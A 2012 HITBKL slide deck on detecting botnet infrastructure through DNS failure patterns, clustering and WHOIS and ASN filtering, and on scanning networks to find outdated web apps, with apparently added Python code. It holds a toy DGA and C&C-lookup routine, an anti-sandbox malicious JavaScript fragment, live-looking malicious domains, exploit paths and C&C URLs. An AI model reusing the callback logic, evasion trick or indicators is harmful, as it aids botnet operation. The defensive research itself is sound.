Messing up with Kids playground:
   Eradicating easy targets

  Yarochkin Fyodor @fygrave
Vladimir Kropotov @vbkropotov



   Presented at HITBKL 2012
agenda



Introduction (cybercrime 2012 – Russian style :)
Detecting malicious network infrastructure
Getting one-step-ahead
Conclusions
DCCrime-2012: Brief Introduction
●   Bots and Botnets – still popular :)
●   Monetization schemes vary.
●   DbD (drive-by download) is one of the most common attack vectors
    –   We also have email
    –   We also have stupid users downloading sh*t
    –   Mobile is a lucrative target (all your money is there)
DCCrime-2012: Introduction




“Traffic” is still an important component of the process :)
Main “components” to deal with
●   Callback nodes (aka C&C)
●   Traffic:
    –   Compromised machines or manipulated content
    –   Banner networks
    –   SEO (doorways)
What's new this year?
●   Automated detection gets difficult (anti-sandboxing, anti-crawler tricks)
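function() {
    var url = 'http://yyzola.gpbbsdhmjm.shacknet.nu/g/';
    …
    // the handler below only fires on real mouse movement, which
    // automated crawlers and sandboxes typically never generate
    document.onmousemove = function() {
        …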
●   In some cases of idiocy, human interaction is a must..
●   Mobile phones are the most common means of funds transfer
Mobile scams
●   Fake apps are still big
●   Android apps avail :)
So really, how easy is it to get pwned
             in Russia? :)
●   So the focus of this research:
    –   Identifying the “bad kids'” playground: mapping infrastructure,
        identifying potential targets, and attempting to fix the problems
        before “things hit hard”
Detecting malicious network
       infrastructure
DNS (did you see this morning's
      passive DNS talk? ;-))


With the spike in generative-domain botnets, this
    seemed like an interesting research project

 DGAs produce a very specific pattern in DNS
                 traffic
Is this the only method to call back?



                Nope..
Alternatives...




Domain generative bots
●   C&C is not hardcoded to maintain flexibility in
    cases when C&C is taken down.
●   Some sort of algorithm is used to generate
    domain names
●   The generated domains are tested for validity (resolved),
    and the C&C IP address is obtained
●   Sometimes obfuscation is involved (for example,
    manipulations applied to the resolved IP address)
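The callback procedure above can be sketched in Python. This is a toy, assuming a date-seeded SHA-256 generator, an XOR key as the "manipulation applied to the resolved IP address", and a pluggable resolver; `generate_domains`, `deobfuscate`, `find_cnc` and `XOR_KEY` are hypothetical names, and none of this is the algorithm of Carberp, Palevo or any other real family.

```python
import hashlib
import ipaddress
from datetime import date
from typing import Callable, Iterable, List, Optional, Tuple

# HYPOTHETICAL toy DGA for illustration only; not the algorithm of
# Carberp, Palevo or any other real malware family.
def generate_domains(day: date, count: int = 10, tld: str = "eu") -> List[str]:
    """Derive `count` domain names from the date, a seed bot and herder share."""
    domains = []
    for i in range(count):
        digest = hashlib.sha256(f"{day.isoformat()}-{i}".encode()).digest()
        # Map the first 11 digest bytes onto lowercase letters a-z.
        label = "".join(chr(ord("a") + b % 26) for b in digest[:11])
        domains.append(f"{label}.{tld}")
    return domains


# HYPOTHETICAL obfuscation: real C&C address = resolved address XOR key.
XOR_KEY = 0x0A0B0C0D


def deobfuscate(ip: str, key: int = XOR_KEY) -> str:
    return str(ipaddress.IPv4Address(int(ipaddress.IPv4Address(ip)) ^ key))


def find_cnc(candidates: Iterable[str],
             resolve: Callable[[str], Optional[str]]) -> Optional[Tuple[str, str]]:
    """Resolve candidates in order; most fail (NXDOMAIN), the first hit wins."""
    for name in candidates:
        ip = resolve(name)  # None stands for a failed lookup
        if ip is not None:
            return name, deobfuscate(ip)
    return None


if __name__ == "__main__":
    todays = generate_domains(date(2012, 10, 10), count=5)
    # Stand-in resolver: pretend only the fourth generated name is registered.
    fake_dns = {todays[3]: "1.2.3.4"}
    print(find_cnc(todays, fake_dns.get))
```

Because every bot walks the same candidate list and most names are never registered, the resolver sees a burst of failed lookups for similar-looking names in one zone, which is the DNS pattern the detection described below keys on.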
How it looks on the wire
C&C/generative domains and
            pattern mining
●   Bots that use generated domain names produce very specific,
    voluminous DNS traffic
●   Our research is primarily focused on picking up
    these patterns. Example: Carberp (details
    provided by Vladimir Kropotov)
Carberp
●   Bot infection: Drive-By-HTTP
●   Payload and intermediate malware domains: normal domains with
    recent registration dates, or DynDNS
●   Distributed via: many, many compromised websites (top
    score: > 100 compromised resources detected within one
    week)
●   C&C domains are usually generated, but there are some special
    cases (see below ;-))
●   C&C and malware domains are located in the same AS (from
    the bot's point of view), which makes them easy to detect
●   Typical bot activity: mass HTTP POST requests
Size   | Payload                | Referrer          | URL                                                        | Domain
9414   | javascript             | www.*****press.ru | /g/18418362672595167.js                                    | beatshine.is-saved.org
45443  | html                   | www.*****press.ru | /index.php?28d9000e56c2a63080ff89c6f5357591                | activatedreplacing.is-very-evil.org
4135   | application/x-jar      | -                 | //images/r/785cee8be7f1da9a9d60820cbf8b1840.jar            | activatedreplacing.is-very-evil.org
155529 | application/executable | -                 | /server_privileges.php?91370f5f009a815950578cb539f28b58=3  | activatedreplacing.is-very-evil.org
Size   | Payload                | Referrer      | URL               | Domain
997    | html                   | Infected site | /1/s.html         | 3645455029
4923   | javascript             | 3645455029    | /js/deployJava.js | Java.com
18046  | application/x-jar      | -             | /1/exp.jar        | 3645455029
138352 | application/executable | -             | /file1.dat        | 3645455029
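The Domain column of the second table holds 3645455029 rather than a hostname. One reading (ours, not stated on the slide) is that this is one of the "special cases": an IPv4 address written as a single 32-bit decimal integer, a host form browsers accept in URLs. Under that assumption it decodes with the standard library; `decimal_host_to_ipv4` is a hypothetical helper name.

```python
import ipaddress
from typing import Optional


def decimal_host_to_ipv4(host: str) -> Optional[str]:
    """Return the dotted-quad form if `host` is one 32-bit decimal integer, else None."""
    if host.isascii() and host.isdigit() and int(host) < 2 ** 32:
        return str(ipaddress.IPv4Address(int(host)))
    return None


for host in ("3645455029", "Java.com"):
    print(host, "->", decimal_host_to_ipv4(host))
# 3645455029 -> 217.73.58.181
# Java.com -> None
```

Normalizing such hosts before the IP-to-ASN step lets decimal-encoded URLs land in the same AS bucket as ordinary dotted-quad ones.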
Detection: related works
M. Antonakakis, R. Perdisci, et al. From Throw-Away Traffic to Bots: Detecting
the Rise of DGA-Based Malware. In Proceedings of USENIX Security, 2012.
L. Bilge, E. Kirda, C. Kruegel, and M. Balduzzi. EXPOSURE: Finding malicious
domains using passive DNS analysis. In Proceedings of NDSS, 2011.
etc..
What we do differently:
●   “Lazy” WHOIS lookups, Team Cymru IP-to-ASN
    lookups
●   Our own passive DNS index
●   Sandbox farm (mainly to detect compromised
    websites automagically and study their behavior)
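A minimal sketch of a "lazy" IP-to-ASN lookup, assuming Team Cymru's DNS interface (a TXT query for the reversed IPv4 octets under `origin.asn.cymru.com`, answered with pipe-separated fields) and an in-process cache so each IP is queried at most once. The TXT fetch itself is injected as `fetch_txt` (plug in any DNS library); `AsnInfo`, `make_lazy_lookup` and the other names are hypothetical.

```python
import functools
from typing import Callable, NamedTuple


class AsnInfo(NamedTuple):
    asn: str
    prefix: str
    country: str
    registry: str
    allocated: str


def cymru_query_name(ip: str) -> str:
    """Team Cymru's DNS interface takes the IPv4 octets reversed."""
    return ".".join(reversed(ip.split("."))) + ".origin.asn.cymru.com"


def parse_cymru_txt(txt: str) -> AsnInfo:
    """Parse an answer like '23028 | 216.90.108.0/24 | US | arin | 1998-09-25'."""
    return AsnInfo(*(field.strip() for field in txt.strip().strip('"').split("|")))


def make_lazy_lookup(fetch_txt: Callable[[str], str]) -> Callable[[str], AsnInfo]:
    """Wrap a TXT fetcher so each IP is resolved only once, on first use."""
    @functools.lru_cache(maxsize=100_000)
    def lookup(ip: str) -> AsnInfo:
        return parse_cymru_txt(fetch_txt(cymru_query_name(ip)))
    return lookup
```

The cache is what makes it "lazy": nothing is looked up until a domain's IP is actually needed, and the very repetitive IPs seen in DGA traffic hit the network only once.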
Dealing with false positives: filtering
●   Generated sequences: n-gram analysis
●   WHOIS cross-reference (if available)
●   IPs belonging to malicious ASNs
●   Public domain lists (Alexa top 100k) work well
    as a whitelist
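One simple form of the n-gram check, sketched under our own assumptions: bigram (two-character) frequencies are learned from known-good names such as whitelist labels, and a candidate label is scored by the mean log-probability of its bigrams with add-one smoothing. `train_bigrams`, `bigram_score` and `PAIR_SPACE` are hypothetical names, and no threshold from the talk is implied.

```python
import math
from collections import Counter
from typing import Iterable

# 26 * 26 lowercase letter pairs; used for add-one smoothing (approximate
# if labels also contain digits or hyphens).
PAIR_SPACE = 26 * 26


def train_bigrams(names: Iterable[str]) -> Counter:
    """Count two-character sequences in known-good names (e.g. whitelist labels)."""
    counts: Counter = Counter()
    for name in names:
        name = name.lower()
        counts.update(name[i:i + 2] for i in range(len(name) - 1))
    return counts


def bigram_score(label: str, counts: Counter) -> float:
    """Mean log-probability of the label's bigrams; lower looks less 'natural'."""
    label = label.lower()
    pairs = [label[i:i + 2] for i in range(len(label) - 1)]
    if not pairs:
        return 0.0
    total = sum(counts.values())
    return sum(math.log((counts[p] + 1) / (total + PAIR_SPACE)) for p in pairs) / len(pairs)
```

Pronounceable generators (consonant-vowel names like those in the Palevo list) may score much closer to real words than random strings do, which is why this works as one signal next to WHOIS, ASN and whitelist filtering rather than on its own.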
Cat and mouse game
●   Of course, all of this is easy to evade once you
    know the method. But security is always a
    'cat-n-mouse' game ;-)
Architecture
●   What we are building ;)
Are we using signatures?
    Yes and No..
●   We don't have signatures for C&C domains..
●   But we maintain patterns for suspicious WHOIS
    data (registration date, registrar, email, ..)
●   Historical DNS and AS association (bad IPs)
●   Generic patterns for generative domains (a high volume
    of similarly distributed failed lookups
    within the same zone)
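The "similarly distributed failed lookups within the same zone" pattern can be approximated as follows. This sketch assumes the zone is the TLD, uses label length as the distribution, and keeps counts in memory (the talk stores its data in Redis); `failure_profile`, `suspicious_zones` and both thresholds are hypothetical.

```python
from collections import Counter, defaultdict
from typing import Dict, Iterable, List, Tuple

NXDOMAIN = 3  # DNS rcode for "non-existent domain" (SERVFAIL is 2)


def failure_profile(events: Iterable[Tuple[str, int]],
                    rcodes: Tuple[int, ...] = (NXDOMAIN,)) -> Dict[str, Counter]:
    """Per zone (here: the TLD), count failed lookups by length of the label below it."""
    profile: Dict[str, Counter] = defaultdict(Counter)
    for qname, rcode in events:
        if rcode not in rcodes:
            continue
        labels = qname.rstrip(".").lower().split(".")
        if len(labels) >= 2:
            profile[labels[-1]][len(labels[-2])] += 1
    return profile


def suspicious_zones(profile: Dict[str, Counter], min_failures: int = 50,
                     min_share: float = 0.5) -> List[Tuple[str, int, int]]:
    """Flag zones where many failures concentrate on a single label length."""
    flagged = []
    for zone, by_length in profile.items():
        total = sum(by_length.values())
        length, top = by_length.most_common(1)[0]
        if total >= min_failures and top / total >= min_share:
            flagged.append((zone, length, total))
    return flagged
```

Passing `rcodes=(3, 2)` also counts SERVFAIL answers, the second starting point of the walk-through.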
A walk through automated detection
●   In this example we show, step by step, how automated
    detection works, using Redis queries in the form of
    an interactive session:
Detection starting point: rcode 3
         (NXDOMAIN, non-existent domains)
Rcode 2 domains
Detection: rcode 2 (SERVFAIL, failed servers)
Sample analysis (step by step)
●   Start by looking for a failed-lookup pattern and its cluster ID:
Sample analysis (two)
●   Get the cluster ID: (eu_11_14)




Clustering is based on domain similarity. Currently used characteristics:
- f(zone, pattern (length, depth))
- additional characteristics (being built up): natural-language domain vs. generated string
  (occurrence of two-character sequences, i.e. bigram n-grams)
- domain registration parameters (obtained via WHOIS [problematic!])
- cross-reference with our existing malicious IP and AS reputation database (built up
  incrementally)
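A hypothetical reading of f(zone, pattern(length, depth)) as a cluster key, for illustration only. The slide's ID (eu_11_14) has a third field whose meaning is not stated; this sketch puts the label depth there instead, so it will not reproduce the slide's IDs. `cluster_key` and `clusters` are hypothetical names.

```python
from collections import defaultdict
from typing import Dict, Iterable, List


def cluster_key(domain: str) -> str:
    """HYPOTHETICAL key: '<zone>_<first-label length>_<depth in labels>'."""
    labels = domain.rstrip(".").lower().split(".")
    return f"{labels[-1]}_{len(labels[0])}_{len(labels)}"


def clusters(domains: Iterable[str]) -> Dict[str, List[str]]:
    """Group domains that share a cluster key, preserving input order."""
    groups: Dict[str, List[str]] = defaultdict(list)
    for d in domains:
        groups[cluster_key(d)].append(d)
    return dict(groups)
```

A key built only from zone and length is coarse: avatarmaker.eu has an 11-letter label just like cihunemyror.eu, so it lands in the same cluster. The remaining characteristics above (bigrams, WHOIS, IP/AS reputation) exist to split such look-alikes out again.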
Sample analysis
●   Get other members of the cluster
Sample analysis
●   Find common members (notice that avatarmaker.eu
    could be a false positive; it is easily filtered out
    through common-denominator filtering on IP and
    WHOIS information)
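Common-denominator filtering on the IP can be sketched like this: keep the cluster members that resolve to the most frequent address and set the rest aside as likely false positives. `common_denominator` is a hypothetical name, and the addresses in the check below are RFC 5737 documentation IPs, not observed data; the same idea extends to WHOIS fields.

```python
from collections import Counter
from typing import Dict, List, Tuple


def common_denominator(members: Dict[str, str]) -> Tuple[str, List[str], List[str]]:
    """members maps domain -> resolved IP.

    Returns (most common IP, domains sharing it, domains that do not).
    """
    ip, _ = Counter(members.values()).most_common(1)[0]
    kept = sorted(d for d, a in members.items() if a == ip)
    dropped = sorted(d for d, a in members.items() if a != ip)
    return ip, kept, dropped
```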
Sample analysis
●   So we have C&C IP 66.175.210.173
●   We can continue mining to see whether we get any
    other domain names:
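The mining step, pivoting from a C&C IP to other domain names, amounts to walking a passive DNS index in both directions. Below is a toy in-memory version, assuming the index stores domain/IP pairs from observed answers (the talk's index lives in Redis); `PassiveDNSIndex` and `pivot` are hypothetical names.

```python
from collections import defaultdict
from typing import DefaultDict, Set


class PassiveDNSIndex:
    """Toy in-memory stand-in for a passive DNS store."""

    def __init__(self) -> None:
        self.by_ip: DefaultDict[str, Set[str]] = defaultdict(set)
        self.by_domain: DefaultDict[str, Set[str]] = defaultdict(set)

    def add(self, domain: str, ip: str) -> None:
        """Record one observed A-record answer (domain -> ip)."""
        self.by_ip[ip].add(domain)
        self.by_domain[domain].add(ip)

    def pivot(self, ip: str, max_hops: int = 2) -> Set[str]:
        """Alternate IP -> domains -> IPs, collecting every domain within max_hops."""
        seen_ips: Set[str] = {ip}
        seen_domains: Set[str] = set()
        frontier = {ip}
        for _ in range(max_hops):
            new_domains = set().union(
                *(self.by_ip.get(i, set()) for i in frontier)) - seen_domains
            seen_domains |= new_domains
            frontier = set().union(
                *(self.by_domain.get(d, set()) for d in new_domains)) - seen_ips
            seen_ips |= frontier
            if not frontier:
                break
        return seen_domains
```

Keeping `max_hops` small matters: a single shared-hosting IP can pull in thousands of unrelated domains, which then need the same filtering as the cluster members.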
Sample analysis
●   Look! We just met an old friend!!
Sample analysis
●   Palevo:
Mapping C&C (easily automated)

●   http://cihunemyror.eu/login.php
●   http://foxivusozuc.eu/login.php
●   http://ryqecolijet.eu/login.php
●   http://xuqohyxeqak.eu/login.php
●   http://foqaqehacew.eu/login.php
●   http://jecijyjudew.eu/login.php
●   http://voworemoziv.eu/login.php
●   http://mamixikusah.eu/login.php
●   http://qebahilojam.eu/login.php
●   http://foqaqehacew.eu/search.php
●   http://foqaqehacew.eu/search.php
●   http://foqaqehacew.eu/LMvg9Ng1d.php
Sample analysis
●   Finding more relevant domains:
Automation
Zoom in...
Performance
●   On a single machine (32 GB RAM) we process up to
    2,000 pkt/sec without significant performance
    loss
●   Average load:
Other Interesting numbers
●   Packets per day: ~130M (filtered)
●   Malicious domains/day: ~30k DNS queries (varies)
●   Avg. 30-50 requests/minute for a single domain
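The two throughput figures can be cross-checked, assuming (this is not stated on the slides) that the ~130M filtered packets/day are all handled by the single 32 GB machine quoted under Performance:

$$
\frac{130 \times 10^{6}\ \text{packets/day}}{86\,400\ \text{s/day}} \approx 1\,505\ \text{packets/s} < 2\,000\ \text{packets/s}
$$

So the daily average sits at roughly three quarters of the quoted ceiling; peak-hour rates will be higher than this average. Likewise, 30-50 requests/minute for a single domain is about 0.5-0.83 requests/s.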
Uses of the data
●   Obvious: blacklists
●   Botnet takeovers (cost: 11 USD or less ;)
●   Sinkholing
Detection
●   (demos, let's look at some videos :)
What could be more flux than
                fastflux? ;-)
●   WHOIS fastflux … HOW?!

    Domain ID:D166393631-LROR
    Domain Name:FOOTBALL-SECURITY-WETRLSGPIEO.ORG
    Created On:21-Aug-2012 01:23:52 UTC
    Last Updated On:21-Aug-2012 01:23:53 UTC
    Expiration Date:21-Aug-2013 01:23:52 UTC
    Sponsoring Registrar:Click Registrar, Inc. d/b/a publicdomainregistry.com (R1935-LROR)
    Status:CLIENT TRANSFER PROHIBITED
    Status:TRANSFER PROHIBITED
    Status:ADDPERIOD
    Registrant ID:PP-SP-001
    Registrant Name:Domain Admin
    Registrant Organization:PrivacyProtect.org
    Registrant Street1:ID#10760, PO Box 16
    Registrant Street2:Note - All Postal Mails Rejected, visit Privacyprotect.org
Moving ahead:
Finding easy targets before they do :)
In short, it is all about quick ways of finding idiots
    who have no clue what they are doing with
 WordPress, osCommerce, OpenX, [put yer fave],
and forcing them to update before they get owned
                           ;)
         And, hmm.. doing it country-wide
disclaimer


 Just another “small data” project we play with:
        a Solr cluster of around 4 machines.

Largely inspired by “Fruit: why so low?” by Adam
            MetlStorm (hack.lu 2011)
Scanning the Internet is not new..
  but it is pretty realistic
Architecture
●   Network port discovery (agents)
●   Banner collection (agents)
●   Backend store: Solr
●   Collected data: services and ports, OS fingerprints,
    ASN/owner/netblock/country, geographical
    location, app data
Architecture(2)
●   Roughly something like that
Approach
●   Scan slow (avoid abuse reports)
●   Index time
●   Passive “mapper” (simple sniffer + browser
    fingerprinting at the moment)
●   Larger range of ports (including port numbers that
    firewall log analysis, honeypot machines, etc. show
    are being actively scanned)
●   For web apps: WAFP fingerprinting + banner indexing
    (noisy; the cause of most of the abuse complaints)
How you use this shit...
Features
●   Scriptable via a RESTful API (think Solr) (cuz UI
    is for sissies ;-))
●   Query by any combination of:
    –   software version/banner regex (Solr/Lucene style)
    –   geospatial search (via geohash)
    –   ASN or regex on ASN owner
    –   country code
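Combining these filters is a matter of building one Lucene query for Solr's `/select` handler. A minimal sketch, assuming a core reachable at a URL like `http://localhost:8983/solr/scans` and untokenized string fields named `banner`, `country` and `asn_owner`; the core and field names and `build_solr_url` are hypothetical, and the geohash filter is left out. Lucene regexes (`field:/regex/`) match whole terms, hence the leading and trailing `.*`.

```python
from typing import Optional
from urllib.parse import parse_qs, urlencode, urlsplit


def build_solr_url(base: str, banner_regex: Optional[str] = None,
                   country: Optional[str] = None,
                   asn_owner_regex: Optional[str] = None, rows: int = 100) -> str:
    """AND together the given filters as a Lucene query for Solr's /select.

    Field names (banner, country, asn_owner) are HYPOTHETICAL schema fields.
    """
    clauses = []
    if banner_regex:
        # Lucene regex syntax is field:/regex/; a literal '/' must be escaped.
        clauses.append("banner:/%s/" % banner_regex.replace("/", "\\/"))
    if country:
        clauses.append("country:%s" % country.upper())
    if asn_owner_regex:
        clauses.append("asn_owner:/%s/" % asn_owner_regex.replace("/", "\\/"))
    query = " AND ".join(clauses) or "*:*"
    return f"{base}/select?" + urlencode({"q": query, "wt": "json", "rows": rows})


url = build_solr_url("http://localhost:8983/solr/scans",
                     banner_regex=".*wordpress.3\\.[0-2].*", country="my")
print(parse_qs(urlsplit(url).query)["q"][0])
# banner:/.*wordpress.3\.[0-2].*/ AND country:MY
```

Fetching that URL and looping over the returned JSON documents is what turns a CERT notification run into the kind of one-liner described below.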
Uses
CERT team: automated notification of idiots
running old WordPress within a particular range,
geographic location, or organization is a one-liner
script
Questions


 @fygrave
@vbkropotov
